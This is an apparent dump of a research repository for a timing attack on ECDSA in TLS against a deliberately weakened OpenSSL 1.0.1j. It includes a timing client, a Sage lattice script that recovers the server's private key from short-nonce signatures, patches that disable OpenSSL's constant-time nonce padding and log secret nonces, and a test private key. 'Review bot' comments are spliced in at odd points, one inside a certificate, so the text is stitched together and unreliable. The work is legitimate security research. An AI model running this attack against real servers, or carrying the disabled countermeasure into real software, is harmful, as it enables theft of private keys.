159 | // ServerKeyExchange.Signature 160 | jj = ii + 4 + length + 4; 161 | length = (receive_buffer[jj - 2] << 8) + receive_buffer[jj - 1]; 162 | fprintf(response_file, "'server_signature': '"); 163 | for(ii = jj; ii < jj + length; ii++){ 164 | fprintf(response_file, "%02x", receive_buffer[ii]); 165 | } 166 | fprintf(response_file, "', "); 167 | 168 | // cycles 169 | fprintf(response_file, " 'time': %" PRIu64 " }\n", end_ticks - start_ticks); 170 | 171 | // close file 172 | fclose(response_file); 173 | 174 | // Close socket 175 | close(sockfd); 176 | 177 | return end_ticks - start_ticks; 178 | } 179 | 180 | int main(int argc, char *argv[]) 181 | { 182 | char clienthello[] = "\x16\x03\x01\x01\x2e\x01\x00\x01\ 183 | \x2a\x03\x03\x6d\x70\xd7\xa7\x43\x44\xe7\xcc\xf7\xc3\xac\ 184 | \xe7\xc7\x7f\xf3\x9f\x9d\x9b\x2e\xa5\x6d\x26\xac\x92\x92\ 185 | \x22\x4a\xa3\x2f\x17\xc1\x0b\x00\x00\x94\xc0\x30\xc0\x2c\ 186 | \xc0\x28\xc0\x24\xc0\x14\xc0\x0a\x00\xa3\x00\x9f\x00\x6b\ 187 | \x00\x6a\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x32\xc0\x2e\ 188 | \xc0\x2a\xc0\x26\xc0\x0f\xc0\x05\x00\x9d\x00\x3d\x00\x35\ 189 | \x00\x84\xc0\x2f\xc0\x2b\xc0\x27\xc0\x23\xc0\x13\xc0\x09\ 190 | \x00\xa2\x00\x9e\x00\x67\x00\x40\x00\x33\x00\x32\x00\x9a\ 191 | \x00\x99\x00\x45\x00\x44\xc0\x31\xc0\x2d\xc0\x29\xc0\x25\ 192 | \xc0\x0e\xc0\x04\x00\x9c\x00\x3c\x00\x2f\x00\x96\x00\x41\ 193 | \x00\x07\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\ 194 | \xc0\x12\xc0\x08\x00\x16\x00\x13\xc0\x0d\xc0\x03\x00\x0a\ 195 | \x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06\ 196 | \x00\x03\x00\xff\x01\x00\x00\x6d\x00\x0b\x00\x04\x03\x00\ 197 | \x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\ 198 | \x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\ 199 | \x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\ 200 | \x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\ 201 | \x00\x11\x00\x23\x00\x00\x00\x0d\x00\x20\x00\x1e\x06\x01\ 202 | \x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\ 
203 | \x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\ 204 | \x00\x0f\x00\x01\x01"; 205 | 206 | int iteration = atoi(argv[1]); 207 | 208 | uint64_t cycles; 209 | unsigned int ii; 210 | 211 | for(ii = 0; ii < iteration; ii++){ 212 | init(); 213 | printf("#%i\n", ii); 214 | cycles = send_request(ii, "12.12.12.12", 4433, clienthello, 307); 215 | } 216 | 217 | return 0; 218 | } 219 | 220 | -------------------------------------------------------------------------------- /setup/client/offline/README.md: -------------------------------------------------------------------------------- 1 | # The lattice attack 2 | 3 | Now that you have done the attack you should have a set of signatures (r, s) and their relevant truncated digests. You can now mount the attack with `lattice.sage` and the Sage software. 4 | 5 | You should: 6 | 7 | * get rid of the first ~10 responses, they might be rubbish because of server caching or something. 8 | 9 | * take the set of the 60 smallest timings, then take a subset of 43 tuples from it and try the attack. Rinse and repeat. 
10 | -------------------------------------------------------------------------------- /setup/client/offline/download.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # get server 4 | scp user@servermachine:/path_to/server.log server.log 5 | 6 | # get client 7 | scp user@clientmachine:/path_to/responses.log client.log 8 | 9 | # remove the first results 10 | echo "$(tail -n +11 server.log)" > server.log 11 | echo "$(tail -n +11 client.log)" > client.log 12 | 13 | # debug 14 | wc -l * 15 | 16 | # stats 17 | # python test_timing_of_client.py 18 | -------------------------------------------------------------------------------- /setup/client/offline/lattice.sage: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | ############################################ 4 | # Arguments 5 | ########################################## 6 | 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("file", help="the files to get the tuples of signatures + truncated hashes from") 9 | parser.add_argument("amount", nargs='?', type=int, default=0, help="number of tuples to use from the file") 10 | parser.add_argument("bits", nargs='?', type=int, default=1, help="number of MSB known") 11 | parser.add_argument("-L", "--LLL", action="store_true") 12 | parser.add_argument("-v", "--verbose", action="store_true") 13 | args = parser.parse_args() 14 | 15 | ############################################ 16 | # Helpers 17 | ########################################## 18 | 19 | def lattice_overview(BB, modulo, trick): 20 | for ii in range(BB.dimensions()[_sage_const_0 ]): 21 | a = ('%02d ' % ii) 22 | for jj in range(BB.dimensions()[_sage_const_1 ]): 23 | if BB[ii,jj] == _sage_const_0 : 24 | a += '0' 25 | elif BB[ii,jj] == modulo: 26 | a += 'q' 27 | elif BB[ii,jj] == trick: 28 | a += 't' 29 | else: 30 | a += 'X' 31 | if BB.dimensions()[_sage_const_0 ] < _sage_const_60 : 32 | a += ' ' 33 
| print a 34 | 35 | ############################################ 36 | # Core 37 | ########################################## 38 | 39 | def HowgraveGrahamSmart_ECDSA(digests, signatures, modulo, pubx, trick, reduction): 40 | print "# New attack" 41 | 42 | # Building Equations 43 | # getting rid of the first equation 44 | r0_inv = inverse_mod(signatures[0][0], modulo) 45 | s0 = signatures[0][1] 46 | m0 = digests[0] 47 | 48 | AA = [-1] 49 | BB = [0] 50 | 51 | nn = len(digests) 52 | print "building lattice of size", nn + 1 53 | 54 | for ii in range(1, nn): 55 | mm = digests[ii] 56 | rr = signatures[ii][0] 57 | ss = signatures[ii][1] 58 | ss_inv = inverse_mod(ss, modulo) 59 | 60 | AA_i = Mod(-1 * s0 * r0_inv * rr * ss_inv, modulo) 61 | BB_i = Mod(-1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 62 | AA.append(AA_i.lift()) 63 | BB.append(BB_i.lift()) 64 | 65 | # Embedding Technique (CVP->SVP) 66 | if trick != -1: 67 | lattice = Matrix(ZZ, nn + 1) 68 | else: 69 | lattice = Matrix(ZZ, nn) 70 | 71 | # Fill lattice 72 | for ii in range(nn): 73 | lattice[ii, ii] = modulo 74 | lattice[0, ii] = AA[ii] 75 | 76 | # Add trick 77 | if trick != -1: 78 | print "adding trick:", trick 79 | BB.append(trick) 80 | lattice[nn] = vector(BB) 81 | else: 82 | print "not adding any trick" 83 | 84 | # Display lattice 85 | if args.verbose: 86 | lattice_overview(lattice) 87 | 88 | # BKZ or LLL 89 | if reduction == "LLL": 90 | print "using LLL" 91 | lattice = lattice.LLL() 92 | else: 93 | print "using BKZ" 94 | lattice = lattice.BKZ() 95 | 96 | # If a solution is found, format it 97 | # Note that we only check the first basis vector, we could also check them all 98 | if trick == -1 or Mod(lattice[0,-1], modulo) == trick or Mod(lattice[0,-1], modulo) == Mod(-trick, modulo): 99 | # did we found trick or -trick? 
100 | if trick != -1: 101 | # trick 102 | if Mod(lattice[0,-1], modulo) == trick: 103 | solution = -1 * lattice[0] - vector(BB) 104 | # -trick 105 | else: 106 | print "we found a -trick instead of a trick" # this shouldn't change anything 107 | solution = lattice[0] + vector(BB) 108 | # if not using a trick, the problem is we don't know how the vector is constructed 109 | else: 110 | solution = -1 * lattice[0] - vector(BB) # so we choose this one, randomly :| 111 | #solution = lattice[0] + vector(BB) 112 | 113 | # get rid of (..., trick) if we used the trick 114 | if trick != -1: 115 | vec = list(solution) 116 | vec.pop() 117 | solution = vector(vec) 118 | 119 | # get d 120 | rr = signatures[0][0] 121 | ss = signatures[0][1] 122 | mm = digests[0] 123 | nonce = solution[0] 124 | 125 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 126 | 127 | return True, key 128 | else: 129 | return False, 0 130 | 131 | ############################################ 132 | # Our Attack 133 | ########################################## 134 | 135 | # get public key x coordinate 136 | pubx = 0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 137 | 138 | # we have the private key for verifying our tests 139 | priv = 0x0099ad4abb9a955085709d1dede97aedf230ec0ec9 140 | 141 | # and public key modulo taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 142 | modulo = 5846006549323611672814742442876390689256843201587 143 | 144 | # trick 145 | trick = int(modulo / 2^(args.bits + 1)) # using trick made for MSB known = args.bits 146 | 147 | # LLL or BKZ? 
148 | if args.LLL: 149 | reduction = "LLL" 150 | else: 151 | reduction = "BKZ" 152 | 153 | # Get a certain amount of data 154 | with open(args.file, "r") as f: 155 | tuples = f.readlines() 156 | 157 | if args.amount == 0: 158 | nn = len(tuples) 159 | elif args.amount <= len(tuples): 160 | nn = args.amount 161 | else: 162 | print "can't use that many tuples, using max number of tuples available" 163 | nn = len(tuples) 164 | 165 | print "building", nn, "equations" 166 | 167 | # Parse the data 168 | digests = [] 169 | signatures = [] 170 | 171 | for tuple in tuples[:args.amount]: 172 | obj = eval(tuple) # {'s': long, 'r': long, 'm': long} 173 | digests.append(obj['m']) 174 | signatures.append((obj['r'], obj['s'])) 175 | 176 | # Attack 177 | for tt in [trick]:#, 1, -1]: 178 | status, key = HowgraveGrahamSmart_ECDSA(digests, signatures, modulo, pubx, tt, reduction) 179 | if status: 180 | if tt != -1: 181 | print "found key with trick", trick 182 | else: 183 | print "since we are not using any trick, might not be the solution" 184 | print "key:", key 185 | if key == priv: 186 | print "the key is correct!" 
187 | else: 188 | print "key is incorrect" 189 | else: 190 | print "found nothing" 191 | 192 | print "\n" 193 | -------------------------------------------------------------------------------- /setup/client/run_client.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm responses.log 2> /dev/null 3 | sudo taskset -c 1 nice -n20 ./openssl "$1" # CPU priority (20) and affinity (1) 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /setup/server/README.md: -------------------------------------------------------------------------------- 1 | You can use the `server.key` and `server.pem` as private key and certificate for the victim's server 2 | 3 | You can apply patches to make the server vulnerable AND store useful data 4 | 5 | You can use the utility `run_server.sh path_to_openssl/apps/openssl` to run the server with all the options (modify this file with your own openssl folder) 6 | 7 | You can also use `python create_objects.py > server.log` to create a list of tuples to use for verification, stats, etc... 
8 | -------------------------------------------------------------------------------- /setup/server/create_objects.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # open all files 4 | with open('nonces.log') as f: 5 | nonces = f.readlines() 6 | with open('signatures.log') as f: 7 | signatures = f.readlines() 8 | with open('truncated_digests.log') as f: 9 | digests = f.readlines() 10 | 11 | # iterate 12 | for ii in range(len(nonces)): 13 | signature = eval(signatures[ii]) # dictionnary stringified {'r': ..., 's': ...} 14 | rr = int(signature["r"], 16) 15 | ss = int(signature["s"], 16) 16 | digest = int(digests[ii], 16) # hexstring 17 | nonce = int(nonces[ii]) # int 18 | 19 | # print 20 | data = { "r": rr, "s": ss, "m": digest, "k": nonce } 21 | print str(data) 22 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/#unpatch.patch#: -------------------------------------------------------------------------------- 1 | --- enssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ ecs_ossl.c 2015-08-11 13:37:19.634110128 -0500 3 | 
@@ -147,11 +147,11 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | + /* 9 | if (!BN_add(k, k, order)) goto err; 10 | if (BN_num_bits(k) <= BN_num_bits(order)) 11 | if (!BN_add(k, k, order)) goto err; 12 | - 13 | + */ 14 | /* compute r the x-coordinate of generator * k */ 15 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 16 | { 17 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/README.md: -------------------------------------------------------------------------------- 1 | # Get OpenSSL 2 | 3 | For this we use OpenSSL 1.0.1j although a more recent version might work: 4 | 5 | ``` 6 | wget ftp://ftp.openssl.org/source/old/1.0.1/openssl-1.0.1j.tar.gz 7 | tar xvfz openssl-1.0.1j.tar.gz 8 | cd openssl-1.0.1j && ./config && make 9 | ``` 10 | 11 | # Patch OpenSSL 12 | 13 | All the patch are here, to use them go in the relevant folder and do: 14 | 15 | ``` 16 | patch ecs_oss.c < unpatch.patch 17 | ``` 18 | 19 | Although you might want to do it by hand because I might have fucked the `diff` 20 | 21 | ## Unpatch OpenSSL 22 | 23 | Check `unpatch.patch`, this is a [to revert this patch](https://git.openssl.org/?p=openssl.git;a=blobdiff;f=CHANGES;h=1633d27975c91f122c4e9266b2c3cf4e56e8ffbf;hp=22749650b701d91cc43af24a226369116c2a46f8;hb=992bdde62d2eea57bb85935a0c1a0ef0ca59b3da;hpb=bbcf3a9b300bc8109bb306a53f6f3445ba02e8e9) for OpenSSL.1.0.1j, although it might work on older version since it is so simple. 24 | 25 | go to `openssl/crypto/ecdsa/` and run the patch. 26 | 27 | ## Store signatures 28 | 29 | You can apply `store_signatures.patch`, this will save signatures in `signatures.log` 30 | 31 | go to `openssl/crypto/ecdsa/` and run the patch. 
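Review bot: The three-line comment kept above the now commented-out `BN_add` block still states that G*k is computed with an equivalent scalar of fixed bit-length, which is no longer what the code does once this hunk is applied, so a reader of the patched tree is told the countermeasure is present when it is not. Prepend one line to the opening `/*` of the disabled block, e.g. `/* EXPERIMENT: fixed-bit-length padding of k deliberately disabled below; this reintroduces the timing leak of k's length that the comment above describes. */`, so the removal is explicit wherever the tree is read or diffed later. `unpatch.patch` further down this page carries the identical hunk (this `#unpatch.patch#` copy looks like an editor autosave of it) and needs the same comment. The enclosing function starts and ends outside the hunk.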
32 | 33 | ## Store nonces 34 | 35 | By applying the patch `store_nonces.patch` you will save the nonces generated every time the server is queried 36 | 37 | it saves to `nonces.log` 38 | 39 | ## Store digests 40 | 41 | apply `store_truncated_digests.patch` and get the truncated digests there: `truncated_digests.log` 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/README.md~: -------------------------------------------------------------------------------- 1 | This is a patch for OpenSSL.1.0.1j 2 | although it might work on other version since it is so simple 3 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_nonces.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_ossl.c 2015-08-11 15:43:44.429782271 -0500 3 | 
@@ -147,10 +147,15 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | if (!BN_add(k, k, order)) goto err; 9 | if (BN_num_bits(k) <= BN_num_bits(order)) 10 | if (!BN_add(k, k, order)) goto err; 11 | + 12 | + char* kk = BN_bn2dec(k); 13 | + FILE* nonce_file = fopen("nonces.log", "a"); 14 | + fprintf(nonce_file, "%s\n", kk); 15 | + fclose(nonce_file); 16 | + OPENSSL_free(kk); 17 | 18 | /* compute r the x-coordinate of generator * k */ 19 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 20 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_signatures.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_sign.c 2014-08-06 17:12:03.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_sign.c 2015-08-11 15:38:18.241796371 -0500 3 | @@ -86,12 +86,22 @@ 4 | ECDSA_SIG *s; 5 | RAND_seed(dgst, dlen); 6 | s = ECDSA_do_sign_ex(dgst, dlen, kinv, r, eckey); 7 | if (s == NULL) 8 | { 9 | *siglen=0; 10 | return 0; 11 | } 12 | *siglen = i2d_ECDSA_SIG(s, &sig); 13 | + 14 | + /* store signature object */ 15 | + FILE* signature_file = fopen("signatures.log", "a"); 16 | + char* rr = BN_bn2hex(s->r); 17 | + char* ss = BN_bn2hex(s->s); 18 | + fprintf(signature_file, "{ 'r': '%s', 's': '%s' }\n", rr, ss); 19 | + OPENSSL_free(rr); 20 | + OPENSSL_free(ss); 21 | + fclose(signature_file); 22 | + 23 | ECDSA_SIG_free(s); 24 | return 1; 25 | } 26 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_truncated_digests.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_ossl.c 2015-08-12 13:42:18.794362518 -0500 3 | 
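Review bot: `fopen("nonces.log", "a")` on the added lines is never checked, so a failed open (permissions, missing directory, read-only filesystem) makes the following `fprintf` dereference NULL inside the signing path and takes the server down with it; `BN_bn2dec` can likewise return NULL on allocation failure and is passed straight to `fprintf`. Guard both before writing, e.g. `if (kk != NULL && nonce_file != NULL) fprintf(nonce_file, "%s\n", kk);` with the `fclose` placed under the same NULL check, and still `OPENSSL_free(kk)` on every path. The same unchecked `fopen`/`BN_bn2*` pattern appears in `store_signatures.patch` and `store_truncated_digests.patch` on this page. Note that each line of this log is a per-signature nonce, and this page's lattice script recovers the private key from one nonce plus its signature, so the file deserves the same handling as `server.key`. The enclosing function starts and ends outside the hunk.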
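Review bot: The record written on the added `fprintf` line, `{ 'r': '%s', 's': '%s' }`, is a Python literal that `create_objects.py` elsewhere on this page consumes with `eval`, so whatever ends up in `signatures.log` is executed as Python by the tooling rather than parsed. Emitting two plain hex fields instead, `fprintf(signature_file, "%s %s\n", rr, ss);`, lets the consumer use `split()` and `int(x, 16)` and removes the need for `eval` on a file the server process writes. The NULL checks on `fopen`, `BN_bn2hex` are covered in the note on `store_nonces.patch`. The enclosing function starts and ends outside the hunk.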
@@ -278,6 +285,14 @@ 4 | ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB); 5 | goto err; 6 | } 7 | + 8 | + /* store truncated digests */ 9 | + FILE* digest_file = fopen("truncated_digests.log", "a"); 10 | + char* digest_temp = BN_bn2dec(m); 11 | + fprintf(digest_file, "%s\n", digest_temp); 12 | + OPENSSL_free(digest_temp); 13 | + fclose(digest_file); 14 | + 15 | do 16 | { 17 | if (in_kinv == NULL || in_r == NULL) 18 | 19 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/unpatch.patch: -------------------------------------------------------------------------------- 1 | --- ../../../openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ ecs_ossl.c 2015-08-11 13:37:19.634110128 -0500 3 | 
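Review bot: The log name `truncated_digests.log` chosen on the added `fopen` line does not match `run_server.sh` on this page, which removes `digests.log` (not `truncated_digests.log`) while it does clear `nonces.log` and `signatures.log`; since `create_objects.py` pairs the three logs by line index, a second server run appends to a stale digest log and every tuple goes out of step with its nonce and signature. Either change the script to `rm truncated_digests.log 2> /dev/null` or open `"digests.log"` here, and keep the two in sync with the README. The hunk header `@@ -278,6 +285,14 @@` also suggests this diff was taken against an already-modified file, so it may not apply cleanly to a clean 1.0.1j tree on its own; this is inferred from the offsets only. The NULL checks on `fopen` and `BN_bn2dec` are covered in the note on `store_nonces.patch`. The enclosing function starts and ends outside the hunk.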
@@ -147,11 +147,11 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | + /* 9 | if (!BN_add(k, k, order)) goto err; 10 | if (BN_num_bits(k) <= BN_num_bits(order)) 11 | if (!BN_add(k, k, order)) goto err; 12 | - 13 | + */ 14 | /* compute r the x-coordinate of generator * k */ 15 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 16 | { 17 | -------------------------------------------------------------------------------- /setup/server/run_server.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm nonces.log 2> /dev/null 3 | rm signatures.log 2> /dev/null 4 | rm digests.log 2> /dev/null 5 | "$1" s_server -cert server.pem -key server.key -cipher "ECDHE-ECDSA-AES128-SHA256" -serverpref -quiet 2> /dev/null 6 | -------------------------------------------------------------------------------- /setup/server/server.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PARAMETERS----- 2 | BgUrgQQADw== 3 | -----END EC PARAMETERS----- 4 | -----BEGIN EC PRIVATE KEY----- 5 | MFICAQEEFJmtSrualVCFcJ0d7el67fIw7A7JoAcGBSuBBAAPoS4DLAAEBPPm3f/E 6 | ukUoLz+r4OiiILmJgDh6BdZ4az+9jqect5kc13mFFbvMR85U 7 | -----END EC PRIVATE KEY----- 8 | -------------------------------------------------------------------------------- /setup/server/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpzCCAmSgAwIBAgIJAJbZvRNtLVPmMAoGCCqGSM49BAMCMIHHMQswCQYDVQQG 3 | EwJVUzEcMBoGA1UECAwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEBwwTZXhh 4 | bXBsZUBleGFtcGxlLmNvbTEcMBoGA1UECgwTZXhhbXBsZUBleGFtcGxlLmNvbTEc 5 | MBoGA1UECwwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEAwwTZXhhbXBsZUBl 6 | eGFtcGxlLmNvbTEiMCAGCSqGSIb3DQEJARYTZXhhbXBsZUBleGFtcGxlLmNvbTAe 7 | Fw0xNTA1MDUyMTAxMTZaFw0xNjA1MDQyMTAxMTZaMIHHMQswCQYDVQQGEwJVUzEc 8 | 
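Review bot: After this hunk the context comment at the top of the hunk still states that G*k is computed "using an equivalent scalar of fixed bit-length", but the two `BN_add(k, k, order)` statements it describes are now inside a `/* ... */` block and never execute, so the comment contradicts the code; replacing it with `/* Fixed-bit-length adjustment of k deliberately disabled in this test build: G*k is computed with the raw k. */` makes the nature of the build visible to whoever reads ecs_ossl.c. Deleting the three statements would be cleaner than commenting them out, since the `goto err` text now lives inside a comment. This hunk targets the same lines of the clean ecs_ossl.c as the store_nonces.patch hunk above, so the two presumably cannot be applied together without offsets; the intended application order belongs in the patch README. The enclosing function starts and ends outside the hunk.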
MBoGA1UECAwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEBwwTZXhhbXBsZUBl 9 | eGFtcGxlLmNvbTEcMBoGA1UECgwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UE 10 | CwwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEAwwTZXhhbXBsZUBleGFtcGxl 11 | LmNvbTEiMCAGCSqGSIb3DQEJARYTZXhhbXBsZUBleGFtcGxlLmNvbTBAMBAGByqG 12 | SM49AgEGBSuBBAAPAywABATz5t3/xLpFKC8/q+DooiC5iYA4egXWeGs/vY6nnLeZ 13 | HNd5hRW7zEfOVKNQME4wHQYDVR0OBBYEFDW2F9wGQhnFIxMONSavgQzixJG2MB8G 14 | A1UdIwQYMBaAFDW2F9wGQhnFIxMONSavgQzixJG2MAwGA1UdEwQFMAMBAf8wCgYI 15 | KoZIzj0EAwIDMQAwLgIVA/ZqpNTi5YAwvGVa2jJeq7eL/faIAhUB+vojWffBI9V1 16 | fKZJC9NWhZU0ggI= 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /slides.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/slides.key -------------------------------------------------------------------------------- /slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/slides.pdf -------------------------------------------------------------------------------- /tools/README.md: -------------------------------------------------------------------------------- 1 | # Test nonces quality 2 | 3 | apply `test_nonces_quality.py` on the `nonces.log` logged by the server to get statistics on the length of the nonces generated 4 | 5 | # Create objects 6 | 7 | use `create_objects.py` in the folder with `nonces.log`, `truncated_digests.log` and `signatures.log` to create a long list of data to use in the lattice attack 8 | -------------------------------------------------------------------------------- /tools/create_objects.py: -------------------------------------------------------------------------------- 1 | # open all files 2 | with open('nonces.log') as f: 3 | nonces = 
f.readlines() 4 | with open('signatures.log') as f: 5 | signatures = f.readlines() 6 | with open('truncated_digests.log') as f: 7 | digests = f.readlines() 8 | 9 | # create our object 10 | data = [] 11 | 12 | # iterate 13 | for ii in range(len(nonces)): 14 | signature = eval(signatures[ii]) # dictionnary stringified {'r': ..., 's': ...} 15 | rr = int(signature["r"], 16) 16 | ss = int(signature["s"], 16) 17 | digest = digests[ii] # hexstring 18 | nonce = int(nonces[ii]) # int 19 | 20 | # 21 | data.append({"r": rr, "s": ss, "m": digest, "k": nonce}) 22 | 23 | print str(data) 24 | -------------------------------------------------------------------------------- /tools/get_data_by_bitlength.py: -------------------------------------------------------------------------------- 1 | """ outputs an object 2 | { 3 | {signature: "ewrwe", hash: "fewop", etc... } 4 | ... 5 | } 6 | """ 7 | -------------------------------------------------------------------------------- /tools/get_data_by_timing.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/tools/get_data_by_timing.py -------------------------------------------------------------------------------- /tools/get_small_nonces_data.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | # check arguments 4 | parser = argparse.ArgumentParser() 5 | parser.add_argument("size", help="the size of the nonces related to the signatures/hashes you will receive") 6 | parser.add_argument("amount", help="the amount of tuples you want") 7 | parser.add_argument("-u", "--upperbound", action="store_true") 8 | args = parser.parse_args() 9 | 10 | # open files 11 | with open('server.log') as f: 12 | servers = f.readlines() 13 | 14 | # parse 15 | total = 0 16 | for server in servers: 17 | server = eval(server) 18 | """ 19 | server = {'s': 
4258690496956394045859710327486628073107983527180L, 'r': 5596267126179850251055206297425178818572863924398L, 'm': 306686801322590080711639249229159028718448815200507L, 'k': 1723561017441024778458494094126805326882747377778L} 20 | """ 21 | # is size of nonce good? 22 | size_nonce = len(bin(server['k'])) - 2 23 | if size_nonce == int(args.size) or (size_nonce < int(args.size) and args.upperbound): 24 | obj = {'r': server['r'], 's': server['s'], 'm': server['m']} 25 | print str(obj) 26 | total += 1 27 | if total >= int(args.amount): 28 | break 29 | 30 | -------------------------------------------------------------------------------- /tools/test_nonces_quality.py: -------------------------------------------------------------------------------- 1 | with open('nonces.log') as f: 2 | nonces = f.readlines() 3 | 4 | max_len = 163 # very rare 5 | 6 | lengths = {} 7 | total = 0 8 | 9 | for nonce in nonces: 10 | total += 1 11 | bin_nonce = bin(int(nonce))[2:] 12 | nonce_len = len(bin_nonce) 13 | if nonce_len in lengths: 14 | lengths[nonce_len] += 1 15 | else: 16 | lengths[nonce_len] = 1 17 | 18 | keylist = lengths.keys() 19 | keylist.sort() 20 | 21 | print "%s\t/%s\t%s" % ("length", total, "percentage") 22 | 23 | for length in keylist: 24 | amount = lengths[length] 25 | percentage = int(amount * 100 / total) 26 | print "%s\t%s\t%i" % (length, amount, percentage) 27 | -------------------------------------------------------------------------------- /tools/test_timing_of_client.py: -------------------------------------------------------------------------------- 1 | # open files 2 | with open('client.log') as f: 3 | clients = f.readlines() 4 | 5 | with open('server.log') as f: 6 | servers = f.readlines() 7 | 8 | # 9 | time_sorted = [] 10 | datas = [] 11 | 12 | # parse 13 | for ii in range(len(clients)): 14 | client = eval(clients[ii]) 15 | server = eval(servers[ii]) 16 | 17 | """ 18 | client = {'client_random': '6d70d7a74344e7ccf7c3ace7c77ff39f9d9b2ea56d26ac9292224aa32f17c10b', 
'server_signature': '302e021503d4414c054acf852ef69619094f424cb9bd6fe8ae021502e9f64958ae97c7bf9c15d96d6c2d24b5628d6d0c', 'server_params': '0300174104c1910e8aec8c9db07ebb49430f7ace6d1f5bd6b8f267a294b6ea8e797ae60dad9a21af631756098e4e60c0aaf5f31869fe91265ea6341905f90dc78ee1ed911a', 'server_random': '07991aeb30108f2ced273874ab8b0d8f7d17e5aff173efe614f207b779dabcb3', 'time': 3722992} 19 | server = {'s': 4258690496956394045859710327486628073107983527180L, 'r': 5596267126179850251055206297425178818572863924398L, 'm': 306686801322590080711639249229159028718448815200507L, 'k': 1723561017441024778458494094126805326882747377778L} 20 | """ 21 | # create global object 22 | datas.append(dict(client.items() + server.items())) 23 | 24 | # sort by time 25 | time_sorted.append(client['time']) 26 | 27 | time_sorted.sort() 28 | 29 | # sort the list by time 30 | nonces_sorted_by_time = sorted(datas, key=lambda k: k['time']) 31 | 32 | # helper to give stats on a set of nonces 33 | def stats_nonces(nonces): 34 | lengths = {} 35 | total = 0 36 | 37 | for nonce in nonces: 38 | nonce = nonce['k'] 39 | total += 1 40 | bin_nonce = bin(int(nonce))[2:] 41 | nonce_len = len(bin_nonce) 42 | if nonce_len in lengths: 43 | lengths[nonce_len] += 1 44 | else: 45 | lengths[nonce_len] = 1 46 | 47 | keylist = lengths.keys() 48 | keylist.sort() 49 | 50 | print "%s\t/%s\t%s" % ("length", total, "percentage") 51 | 52 | for length in keylist: 53 | amount = lengths[length] 54 | percentage = int(amount * 100 / total) 55 | print "%s\t%s\t%i" % (length, amount, percentage) 56 | 57 | # stats by time 58 | print "stats on first 50 nonces" 59 | stats_nonces(nonces_sorted_by_time[:50]) 60 | 61 | print "stats on first 100 nonces" 62 | stats_nonces(nonces_sorted_by_time[:100]) 63 | 64 | print "stats on first 500 nonces" 65 | stats_nonces(nonces_sorted_by_time[:500]) 66 | -------------------------------------------------------------------------------- /whitepaper.pdf: 
